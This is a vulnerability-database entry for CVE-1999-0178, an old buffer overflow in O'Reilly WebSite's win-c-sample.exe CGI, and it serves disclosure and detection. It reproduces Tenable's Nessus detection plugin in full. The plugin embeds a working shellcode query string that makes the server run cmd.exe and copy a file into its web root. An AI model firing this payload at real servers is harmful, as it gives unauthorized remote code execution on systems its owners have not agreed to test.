Vulnerabilities > CVE-1999-0178 - Unspecified vulnerability in Oreilly Website 1.1E

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
oreilly
nessus
exploit available
NVD
Published: 1997-01-01
Updated: 2024-11-20

Summary

Buffer overflow in the win-c-sample program (win-c-sample.exe) in the WebSite web server 1.1e allows remote attackers to execute arbitrary code via a long query string.

Vulnerable Configurations

Part Description Count
Application
Oreilly
1

Exploit-Db

descriptionOReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow Vulnerability. CVE-1999-0178. Dos exploit for windows platform
idEDB-ID:20484
last seen2016-02-02
modified1997-01-06
published1997-01-06
reporterSolar Designer
sourcehttps://www.exploit-db.com/download/20484/
titleOReilly WebSite 1.x/2.0 win-c-sample.exe Buffer Overflow Vulnerability

Nessus

NASL familyCGI abuses
NASL idWEBSITE.NASL
descriptionThis web server appears to be a version of O
last seen2020-06-01
modified2020-06-02
plugin id10008
published1999-06-22
reporterThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/10008
titleO'Reilly WebSite win-c-sample Remote Overflow
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if(description)
{
 script_id(10008);
 script_version ("1.41");

 script_cve_id("CVE-1999-0178");
 script_bugtraq_id(2078);

 script_name(english:"O'Reilly WebSite win-c-sample Remote Overflow");
 script_summary(english:"WebSite 1.0 CGI arbitrary code execution");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is prone to a remote buffer overflow attack." );
 script_set_attribute(attribute:"description", value:
"This web server appears to be a version of O'Reilly WebSite that has a
buffer overflow vulnerability in its '/cgi-shl/win-c-sample.exe'
script.  By passing a specially crafted argument to this script, an
unauthenticated, remote attacker can leverage this overflow to execute
arbitrary code on the affected host subject to the privileges under
which the service operates." );
 script_set_attribute(
  attribute:"see_also", 
  value:"https://seclists.org/bugtraq/1997/Jan/25"
 );
 script_set_attribute(attribute:"solution", value:
"Upgrade to O'Reilly WebSite version 2.5, which reportedly addresses
the vulnerability."		 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(
  attribute:"vuln_publication_date", 
  value:"1997/01/06"
 );
 script_set_attribute(
  attribute:"plugin_publication_date", 
  value:"1999/06/22"
 );
 script_cvs_date("Date: 2018/11/15 20:50:19");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");
 script_family(english:"CGI abuses");
 script_category(ACT_DESTRUCTIVE_ATTACK);

 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

##########################
#			 #
# The actual script code # 
#			 #
##########################

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

port = get_http_port(default:80);


outfile = string("x1-", unixtime(), ".htm");
command = "/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\\y[X%050PzPA9%01u%F0%83%E9%10%FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy_\WebSite\readme.1st_\WebSite\htdocs\"+outfile;

res = is_cgi_installed3(item:outfile, port:port);
if(!res)
{
 is_cgi_installed3(item:command, port:port);
 res = is_cgi_installed3(item:outfile, port:port);
 if(res)
 {
  if (report_verbosity > 0)
  {
   report = string(
    "\n",
    "Nessus was able to verify the vulnerability exists using the following\n",
    "URLs :\n",
    "\n",
    "  ", build_url(port:port, qs:command), "\n",
    "  ", build_url(port:port, qs:"/"+outfile), "\n"
   );
   security_hole(port:port, extra:report);
  }
  else security_hole(port);
 }
}

References